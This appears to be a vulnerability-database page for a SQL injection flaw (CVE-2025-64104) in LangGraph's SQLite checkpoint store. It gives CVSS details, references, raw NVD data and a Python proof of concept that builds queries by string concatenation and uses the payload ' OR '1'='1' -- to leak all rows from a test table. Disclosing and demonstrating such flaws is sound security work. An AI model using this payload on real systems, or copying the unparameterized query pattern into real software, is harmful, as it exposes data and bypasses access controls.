CVE-2025-64104

Description

LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Prior to 2.0.11, LangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls. This vulnerability is fixed in 2.0.11.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LangGraph < 2.0.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-64104 PoC - LangGraph SQLite Checkpoint SQL Injection
Note: This is a simplified demonstration for educational purposes only.
"""

import sqlite3
import aiosqlite
import asyncio

# Vulnerable code pattern (before fix)
def vulnerable_query_builder(thread_id, checkpoint_id):
    """
    Simulates the vulnerable SQL query construction in LangGraph < 2.0.11
    Direct string concatenation without parameterization
    """
    # This is the vulnerable pattern - direct string interpolation
    query = f"SELECT * FROM checkpoints WHERE thread_id = '{thread_id}' AND checkpoint_id = '{checkpoint_id}'"
    return query

# Example of SQL Injection payload
def generate_sql_injection_payload():
    """
    Generate SQL injection payload to bypass authentication
    """
    # Payload to inject: ' OR '1'='1' --
    malicious_thread_id = "' OR '1'='1' --"
    malicious_checkpoint_id = "anything"
    return malicious_thread_id, malicious_checkpoint_id

# Demonstrate the vulnerability
def demonstrate_vulnerability():
    # Create a test database
    conn = sqlite3.connect(':memory:')
    cursor = conn.cursor()
    
    # Create test table with sensitive data
    cursor.execute('''
        CREATE TABLE checkpoints (
            thread_id TEXT,
            checkpoint_id TEXT,
            data TEXT,
            access_level TEXT
        )
    ''')
    
    # Insert test data
    cursor.execute("INSERT INTO checkpoints VALUES ('user1', 'ckpt1', 'secret_data_1', 'user')")
    cursor.execute("INSERT INTO checkpoints VALUES ('user2', 'ckpt2', 'secret_data_2', 'admin')")
    conn.commit()
    
    # Normal query (intended behavior)
    print("=== Normal Query ===")
    normal_query = vulnerable_query_builder('user1', 'ckpt1')
    print(f"Query: {normal_query}")
    cursor.execute(normal_query)
    print(f"Result: {cursor.fetchall()}")
    
    # Malicious query (SQL Injection)
    print("\n=== SQL Injection Attack ===")
    malicious_thread_id, malicious_checkpoint_id = generate_sql_injection_payload()
    malicious_query = vulnerable_query_builder(malicious_thread_id, malicious_checkpoint_id)
    print(f"Malicious Query: {malicious_query}")
    cursor.execute(malicious_query)
    print(f"Result (ALL data leaked): {cursor.fetchall()}")
    
    conn.close()

# Async example for LangGraph async usage
async def vulnerable_async_query(db_path, thread_id, checkpoint_id):
    """
    Vulnerable async query pattern used in LangGraph async implementation
    """
    async with aiosqlite.connect(db_path) as db:
        # Vulnerable: direct string formatting
        query = f"SELECT * FROM checkpoints WHERE thread_id = '{thread_id}'"
        async with db.execute(query) as cursor:
            return await cursor.fetchall()

if __name__ == "__main__":
    demonstrate_vulnerability()
    print("\n[!] This PoC demonstrates the SQL injection vulnerability.")
    print("[!] Upgrade to LangGraph >= 2.0.11 to fix this issue.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64104
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64104
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64104/
[4] VulDB https://vuldb.com/cve/CVE-2025-64104
[5] https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4
[6] https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8
[7] https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64104", "sourceIdentifier": "[email protected]", "published": "2025-10-29T19:15:39.220", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Prior to 2.0.11, LangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls. This vulnerability is fixed in 2.0.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4", "source": "[email protected]"}, {"url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8", "source": "[email protected]"}, {"url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}